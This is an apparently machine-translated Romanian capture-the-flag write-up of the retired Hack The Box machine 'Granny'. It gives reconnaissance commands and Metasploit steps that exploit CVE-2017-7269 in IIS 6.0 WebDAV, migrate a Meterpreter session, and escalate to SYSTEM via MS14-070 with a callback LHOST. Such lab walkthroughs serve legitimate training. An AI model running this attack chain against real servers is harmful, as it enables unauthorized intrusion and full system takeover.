Hack The Box (HTB) este o platformă online care vă permite să vă testați abilitățile de testare a penetrării. Conține mai multe provocări care sunt actualizate constant. Unele dintre ele simulează scenarii din lumea reală, iar altele înclină mai mult spre un stil de provocare CTF.

Notă. Sunt permise doar înregistrările de echipamente HTB retrase.

Pastreaza ti calmul si pirateaza cutia Bunicuta

Bunica, în mod similar cu bunicul, poate fi exploatată folosind mai multe metode diferite, cum ar fi CVE-2017-7269, exploatat pe scară largă. Această vulnerabilitate este banală pentru exploatare și a acordat acces imediat la mii de servere IIS din întreaga lume atunci când a devenit publică.

Vom folosi următoarele instrumente pentru a amâna cutia pe un Kali Linux cutie:

  • nmap
  • Searchsploit
  • davtest
  • Metasploit
  • Sugestie de exploatare locală

Să începem.

Adaug bunicuță în fișierul / etc / hosts

nano /etc/hosts

cu

10.10.10.15     granny.htb
1611334450 715 Pastreaza ti calmul si pirateaza cutia Bunicuta

Pasul 1 – Recunoaștere

Primul pas înainte de a exploata o mașină este să faceți un pic de scanare și recunoaștere.

Aceasta este una dintre cele mai importante părți, deoarece va determina ce puteți încerca să exploatați după aceea. Este întotdeauna mai bine să petreceți mai mult timp în această fază pentru a obține cât mai multe informații.

Scanare port

Voi folosi Nmap (Network Mapper). Nmap este un utilitar open source gratuit pentru descoperirea rețelei și audit de securitate. Folosește pachete IP brute pentru a determina ce gazde sunt disponibile în rețea, ce servicii oferă aceste gazde, ce sisteme de operare rulează, ce tip de filtre de pachete / firewall sunt utilizate și alte zeci de caracteristici.

Există multe comenzi pe care le puteți utiliza cu acest instrument pentru a scana rețeaua. Dacă doriți să aflați mai multe despre aceasta, puteți arunca o privire la documentație aici.

1611334450 688 Pastreaza ti calmul si pirateaza cutia Bunicuta

Folosesc următoarea comandă pentru a efectua o scanare intensivă:

nmap -A -v granny.htb

-A: Activați detectarea sistemului de operare, detectarea versiunilor, scanarea scriptului și urmărirea traseului

-v: Creșteți nivelul de verbozitate

granny.htb: numele gazdei pentru caseta Bunicii

Dacă găsiți rezultatele puțin prea copleșitoare, puteți face o altă comandă pentru a obține doar porturile deschise.

nmap granny.htb
1611334450 34 Pastreaza ti calmul si pirateaza cutia Bunicuta

Putem vedea că există doar 1 port deschis:

Port 80, cel mai des folosit de Hypertext Transfer Protocol (HTTP)

Știm că serverul este un IIS 6.0 din http-server-header. Servicii de informare pe internet (IIS, anterior Internet Information Server) este un software extensibil pentru server web creat de Microsoft pentru a fi utilizat cu familia Windows NT. Mai multe informatii aici.

IIS 6.0 (nume de cod „Duct Tape”), inclus în Windows Server 2003 și Windows XP Professional x64 Edition, a adăugat suport pentru IPv6 și a inclus un nou model de proces de lucru care a sporit securitatea, precum și fiabilitatea HTTP.sys a fost introdus în IIS 6.0 ca un ascultător de protocol specific HTTP pentru solicitările HTTP

Putem vedea și din titlul http că site-ul web este „în construcție” și că există un http-webdav-scan cu toate metodele permise.

Folosesc un alt script nmap pentru a încerca să obțin mai multe informații. Scriptul trimite o cerere OPȚIUNI care listează tipul dav, tipul serverului, data și metodele permise. Apoi trimite o cerere PROPFIND și încearcă să aducă directoare expuse și adrese IP interne făcând potrivire de tipare în corpul de răspuns

nmap --script http-webdav-scan -p80 granny.htb

Iată mai multe info pe acest script de pe site-ul web nmap.

1611334450 55 Pastreaza ti calmul si pirateaza cutia Bunicuta

WebDAV sau Creare și versiuni distribuite pe web (WebDAV) este o extensie a Protocolului de transfer hipertext care permite clienților să efectueze operațiuni de creație de conținut Web de la distanță. Mai multe informatii aici.

Putem vedea în secțiunea de asistență a serverului că IIS Microsoft are un modul WebDAV.

eu folosesc davtest pentru a verifica dacă pot încărca fișiere.

1611334450 324 Pastreaza ti calmul si pirateaza cutia Bunicuta

Folosesc următoarea comandă:

davtest -url granny.htb
1611334451 788 Pastreaza ti calmul si pirateaza cutia Bunicuta

Nu pare să pot încărca fișiere. eu folosesc Searchsploit pentru a verifica dacă există vreo vulnerabilitate cunoscută pe IIS 6.0. Searchsploit este un instrument de căutare în linie de comandă pentru Exploatează baza de date.

1611334452 275 Pastreaza ti calmul si pirateaza cutia Bunicuta

Folosesc următoarea comandă:

searchsploit iis 6.0
1611334452 987 Pastreaza ti calmul si pirateaza cutia Bunicuta

Pot obține mai multe detalii despre exploatare cu:

searchsploit -x 41738.py
1611334453 278 Pastreaza ti calmul si pirateaza cutia Bunicuta

Atacul se bazează pe un Programare orientată pe retur lanţ. Programare orientată pe retur (ROP) este o tehnică de exploatare a securității care permite unui atacator să execute cod în prezența apărării de securitate, cum ar fi protecția spațiului executabil și semnarea codului.

De asemenea, puteți verifica Exploatează baza de date pentru a găsi exploatarea.

1611334454 849 Pastreaza ti calmul si pirateaza cutia Bunicuta
https://www.exploit-db.com/search?q=iis+6.0
1611334454 60 Pastreaza ti calmul si pirateaza cutia Bunicuta
https://www.exploit-db.com/exploits/41738

Baza de date națională a vulnerabilităților,

1611334455 253 Pastreaza ti calmul si pirateaza cutia Bunicuta
https://nvd.nist.gov/vuln/detail/CVE-2017-7269

si Vulnerabilități și expuneri comune baza de date merită, de asemenea, verificată.

1611334455 754 Pastreaza ti calmul si pirateaza cutia Bunicuta
1611334456 261 Pastreaza ti calmul si pirateaza cutia Bunicuta
https://www.cvedetails.com/cve/CVE-2017-7269/

Există un modul Metasploit disponibil.

1611334457 873 Pastreaza ti calmul si pirateaza cutia Bunicuta
https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl

Pasul 2 – Vizitarea site-ului web

Nu vedem multe când vizităm site-ul web. Din consola pentru dezvoltatori, putem vedea că este alimentat de ASP.NET cadru

1611334457 25 Pastreaza ti calmul si pirateaza cutia Bunicuta

Noi vom folosi Metasploit, care este un cadru de testare a penetrării care simplifică hacking-ul. Este un instrument esențial pentru mulți atacatori și apărători

1611104533 383 Pastreaza ti calmul si pirateaza cutia Shocker
https://www.metasploit.com/

Lansez Cadrul Metasploit pe Kali și căutați comanda pe care ar trebui să o folosesc pentru a lansa exploit-ul.

1611334459 599 Pastreaza ti calmul si pirateaza cutia Bunicuta

Dacă folosesc această comandă

searchsploit iis 6.0

Primesc același tabel pe care l-am avut de la Terminal mai devreme.

Dacă scriu

search iis 6.0

Am 174 de rezultate.

1611334460 705 Pastreaza ti calmul si pirateaza cutia Bunicuta

Exploit-ul care mă interesează este numărul 147 de pe această listă.

Dacă doriți să obțineți mai multe informații despre exploatare, puteți utiliza următoarea comandă:

info exploit/windows/iis/iis_webdav_scstoragepathfromurl
1611334461 430 Pastreaza ti calmul si pirateaza cutia Bunicuta

Folosesc următoarea comandă pentru a folosi exploit-ul:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

Trebuie să configurez opțiunile înainte de a lansa exploit-ul. Verific opțiunile cu

show options
1611334461 293 Pastreaza ti calmul si pirateaza cutia Bunicuta

Am setat RHOSTS cu următoarea comandă:

set RHOSTS granny.htb

Când verific din nou opțiunile, primesc acest lucru:

1611334461 224 Pastreaza ti calmul si pirateaza cutia Bunicuta

Verific dacă ținta este vulnerabilă la

check

Apoi rulez exploit-ul cu comanda

exploit
1611334461 512 Pastreaza ti calmul si pirateaza cutia Bunicuta

Și primesc un Meterpreter sesiune.

Iată definiția lui Meterpreter din Securitate jignitoare:

Meterpreter este o sarcină utilă avansată, extensibilă dinamic, care folosește in memoria Injecția DLL eșalonează și este extinsă pe rețea în timpul rulării. Comunică prin socket-ul stager și oferă un API Ruby complet client. Conține istoricul comenzilor, completarea filelor, canale și multe altele.

Puteți citi mai multe despre Meterpreter aici.

Să începem prin a aduna câteva informații.

getuid returnează ID-ul de utilizator real al procesului de apelare. Sesiunea pe care am primit-o nu pare să aibă suficiente privilegii pentru a rula această comandă. Accesul este interzis:

1611334462 993 Pastreaza ti calmul si pirateaza cutia Bunicuta

Când se întâmplă acest lucru, listez procesele care rulează cu

ps

și alegeți o alergare NT AUTHORITY NETWORK SERVICE

1611334462 365 Pastreaza ti calmul si pirateaza cutia Bunicuta

Migrez către procesul 792 cu

migrate 792
1611334462 410 Pastreaza ti calmul si pirateaza cutia Bunicuta

Acum, când verific getuid, primesc

Server username: NT AUTHORITYNETWORK SERVICE
1611334462 517 Pastreaza ti calmul si pirateaza cutia Bunicuta

Aceasta este sesiunea pe care am primit-o după migrarea la un alt proces

1611334463 421 Pastreaza ti calmul si pirateaza cutia Bunicuta

Tastez următoarea comandă pentru a obține un shell standard pe sistemul țintă

shell
1611334464 516 Pastreaza ti calmul si pirateaza cutia Bunicuta

Verific cine sunt pe mașină cu comanda

whoami
1611334464 115 Pastreaza ti calmul si pirateaza cutia Bunicuta

Obțin mai multe informații de la mașină cu

systeminfo
1611334465 386 Pastreaza ti calmul si pirateaza cutia Bunicuta

Navig spre C:

1611334465 606 Pastreaza ti calmul si pirateaza cutia Bunicuta

atunci Documente și Setări cu

cd "Documents and Settings"
1611334465 902 Pastreaza ti calmul si pirateaza cutia Bunicuta

Pot vedea doi utilizatori – Administrator și Lakis. Încerc să navighez spre Lakis. Accesul este interzis. La fel și pentru folderul de administrator – care este de așteptat deoarece nu am încă acces root.

1611334465 774 Pastreaza ti calmul si pirateaza cutia Bunicuta

Ies din shell cu comanda

exit
1611334466 667 Pastreaza ti calmul si pirateaza cutia Bunicuta

Pasul 3 – Utilizarea sugestiei de exploatare locală

Conduc sugestie de exploatare locală. Exploitele sunt sugerate pe baza arhitecturii și platformei în care utilizatorul are shell-ul deschis, împreună cu exploitele disponibile în meterpreter.

run post/multi/recon/local_exploit_suggester
1611334467 512 Pastreaza ti calmul si pirateaza cutia Bunicuta

Voi folosi MS14-070 exploata. Caut mai multe informații despre Metasploit cu

info exploit/windows/local/ms14_070_tcpip_ioctl
1611334468 892 Pastreaza ti calmul si pirateaza cutia Bunicuta

Precum și pe Rapid7 site-ul web

1611334468 590 Pastreaza ti calmul si pirateaza cutia Bunicuta
https://www.rapid7.com/db/modules/exploit/windows/local/ms14_070_tcpip_ioctl

Pasul 4 – Utilizarea MS14-070 pentru a efectua escaladarea de privilegii

Am pus această sesiune în fundal cu comanda

background
1611334469 46 Pastreaza ti calmul si pirateaza cutia Bunicuta

Execut următoarea comandă pentru a folosi exploatarea pe care am găsit-o

use exploit/windows/local/ms14_070_tcpip_ioctl
1611334469 486 Pastreaza ti calmul si pirateaza cutia Bunicuta

Apoi verific opțiunile acestui exploit

1611334469 999 Pastreaza ti calmul si pirateaza cutia Bunicuta

Am stabilit sesiunea cu

set SESSION 1
1611334469 768 Pastreaza ti calmul si pirateaza cutia Bunicuta

Conduc exploit-ul cu

run
1611334469 268 Pastreaza ti calmul si pirateaza cutia Bunicuta

Exploit-ul a reușit, dar nu am primit un shell înapoi. Verific opțiunile

1611334469 123 Pastreaza ti calmul si pirateaza cutia Bunicuta

și setați LHOST la IP-ul meu cu

set LHOST 10.10.14.36

Îl poți verifica pe al tău aici.

1611334469 900 Pastreaza ti calmul si pirateaza cutia Bunicuta

Apoi rulez exploit-ul cu

exploit
1611334470 346 Pastreaza ti calmul si pirateaza cutia Bunicuta

Acest lucru confirmă că exploatarea a reușit, dar încă nu primesc un shell. Verific sesiunea cu

sessions -l

ar trebui sa am

NT AUTHORITYSYSTEM
1611334471 431 Pastreaza ti calmul si pirateaza cutia Bunicuta

Ceea ce nu este cazul acum, așa că mă întorc la această sesiune cu

sessions -i 1
1611334471 173 Pastreaza ti calmul si pirateaza cutia Bunicuta

Verific getuid si ia NT AUTHORITY SYSTEM înapoi. Primesc un shell standard pe sistemul țintă și verific cine sunt eu pe mașină. eu iau NT AUTHORITY NETWORK SERVICE înapoi, ceea ce nu vreau!

Ies din acest shell și verific procesele. Văd că am acces de administrator pe aparat. Tocmai am dorit să migrez către un alt proces, cu care fac

migrate 408
1611334471 582 Pastreaza ti calmul si pirateaza cutia Bunicuta

M-am întors la shell-ul standard al sistemului țintă. Și când verific cine sunt pe aparat, în sfârșit sunt administrator!

Pasul 5 – Căutați steagul user.txt

Navig la Lakis dosar din Documente și Setări.

Pot lista toate fișierele / folderele cu următoarea comandă

dir

Mă mut apoi la Desktop

1611334471 172 Pastreaza ti calmul si pirateaza cutia Bunicuta

Și găsesc steagul utilizatorului! Pot verifica conținutul fișierului cu

type user.txt

Pasul 6 – Căutați steagul root.txt

Să găsim steagul rădăcină acum! Navig până la Utilizatori și verificați la Administrator/Desktop pliant. Găsesc steagul!

1611334471 649 Pastreaza ti calmul si pirateaza cutia Bunicuta

Folosesc următoarea comandă pentru a vedea conținutul fișierului

type root.txt
1611334472 77 Pastreaza ti calmul si pirateaza cutia Bunicuta

Felicitări! Ai găsit ambele steaguri!

Vă rugăm să nu ezitați să comentați, să puneți întrebări sau să partajați cu prietenii dvs. 🙂

Puteți vedea mai multe articole aici.

Poți să mă urmărești mai departe Stare de nervozitate sau pe LinkedIn.

Și nu uitați săGetSecure, #Fii sigur & #StaySecure!


Alte articole Hack The Box

  • Păstrați-vă calmul și hack the Box – Lame
  • Păstrează-ți calmul și piratează cutia – moștenire
  • Keep Calm and Hack The Box – Devel
  • Keep Calm and Hack The Box – Beep
  • Păstrați-vă calmul și hack the box – optim
  • Keep Calm and Hack The Box – Arctic
  • Păstrează-ți calmul și piratează cutia – bunicul
Pastreaza ti calmul si pirateaza cutia Bunicuta